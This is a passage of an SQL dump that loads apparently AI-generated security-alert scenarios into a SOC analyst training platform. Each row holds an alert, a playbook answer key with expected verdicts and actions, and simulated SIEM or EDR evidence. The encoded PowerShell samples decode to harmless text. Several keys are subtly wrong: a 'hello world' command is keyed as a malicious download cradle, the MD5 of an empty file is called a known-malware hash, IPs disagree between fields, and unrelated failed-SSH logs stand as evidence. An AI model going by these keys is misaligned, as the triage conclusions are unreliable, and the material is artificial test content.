2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.075Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T07:30:00Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.4.55\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"david\\\",\\\"hostname\\\":\\\"DEV-WORKSTATION\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -Command Update-Help\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1725, 'Encoded PowerShell Execution with Suspicious Network Activity', 'high', 'Sysmon', 'Encoded PowerShell command detected with subsequent connection to a suspicious external IP, indicating potential C2 activity.', 'Malware', 'T1090', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:01:56Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.5.100\",\"dst_ip\":\"203.0.113.99\",\"username\":\"emily\",\"hostname\":\"CORP-LAPTOP\",\"request_body\":\"\",\"command_line\":\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised laptop\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with C2 servers\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command possibly indicating connection to C2\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The encoded PowerShell command followed by network activity to a known malicious IP indicates C2 communication.\"}', 'Intermediate', 'EDR', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.078Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:01:56Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.5.100\\\",\\\"dst_ip\\\":\\\"203.0.113.99\\\",\\\"username\\\":\\\"emily\\\",\\\"hostname\\\":\\\"CORP-LAPTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"powershell.exe -EncodedCommand ZWNobyAnQ29ubmVjdCB0byBDMg==\'\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1726, 'Attempted Process Hollowing in explorer.exe', 'high', 'SentinelOne', 'An attempted process hollowing in explorer.exe was detected, which could indicate a potential malware injection.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T05:20:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.10.20\",\"dst_ip\":\"\",\"username\":\"fthomas\",\"hostname\":\"SALES-DESKTOP\",\"request_body\":\"\",\"command_line\":\"explorer.exe\"}', '2026-03-15 19:48:49', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.10.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected desktop\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected attempt at process hollowing in explorer.exe\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing is a technique used by malware to hide its execution by injecting code into legitimate processes.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.079Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T05:20:30Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.10.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"fthomas\\\",\\\"hostname\\\":\\\"SALES-DESKTOP\\\",\\\"request_body\\\":\\\"\\\",\\\"command_line\\\":\\\"explorer.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1727, 'PowerShell Download Cradle Detected', 'high', 'CrowdStrike', 'A PowerShell script was executed using a download cradle. The script was encoded and executed on an internal host.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T08:20:35Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.10\",\"dst_ip\":\"203.0.113.22\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"command_line\":\"powershell -EncodedCommand aGVsbG8gd29ybGQ=\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address detected in PowerShell execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.22\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for hosting malicious content\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand aGVsbG8gd29ybGQ=\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command suggests malicious activity\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell encoded command and contact with a malicious IP confirm a malware attack.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1728, 'Process Hollowing Detected in Explorer.exe', 'critical', 'SentinelOne', 'Process hollowing detected in explorer.exe, indicating possible code injection to hide malicious activity.', 'Malware', 'T1055', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T10:45:22Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"\",\"username\":\"admin\",\"hostname\":\"INTERNAL-SERVER01\",\"command_line\":\"explorer.exe /inject\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in process hollowing\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"explorer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"explorer.exe /inject\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process hollowing technique detected\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"Process hollowing in explorer.exe indicates a high-risk malware infiltration.\"}', 'Intermediate', 'EDR', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.082Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T10:45:22Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"INTERNAL-SERVER01\\\",\\\"command_line\\\":\\\"explorer.exe /inject\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1729, 'Suspicious PowerShell Execution Detected', 'medium', 'Sysmon', 'An internal system executed a PowerShell script using an encoded command, potentially indicating malicious intent.', 'Malware', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-15T12:30:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"192.168.1.100\",\"username\":\"bsmith\",\"hostname\":\"WORKSTATION-01\",\"command_line\":\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address executing a PowerShell script\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Encoded command decoded to benign PowerShell script\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The decoded PowerShell command is benign and not indicative of malicious activity.\"}', 'Intermediate', 'EDR', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.083Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T12:30:45Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.15\\\",\\\"dst_ip\\\":\\\"192.168.1.100\\\",\\\"username\\\":\\\"bsmith\\\",\\\"hostname\\\":\\\"WORKSTATION-01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand cHJpbnQgIkhlbGxvLCBXb3JsZCEi\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1730, 'Unauthorized PowerShell Script Execution', 'high', 'Carbon Black', 'Detected execution of an unauthorized PowerShell script with an encoded command targeting an external IP.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-15T14:05:12Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"198.51.100.40\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP01\",\"command_line\":\"powershell -EncodedCommand d2hvYW1pIQ==\"}', '2026-03-15 19:49:29', '2026-03-15 20:58:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address involved in unauthorized script execution\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.40\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple phishing campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell -EncodedCommand d2hvYW1pIQ==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded PowerShell command matched with known malicious patterns\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The PowerShell execution with contact to a known malicious IP indicates an active threat.\"}', 'Intermediate', 'EDR', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-15T14:05:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"192.168.1.50\\\",\\\"dst_ip\\\":\\\"198.51.100.40\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP01\\\",\\\"command_line\\\":\\\"powershell -EncodedCommand d2hvYW1pIQ==\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:16.085Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 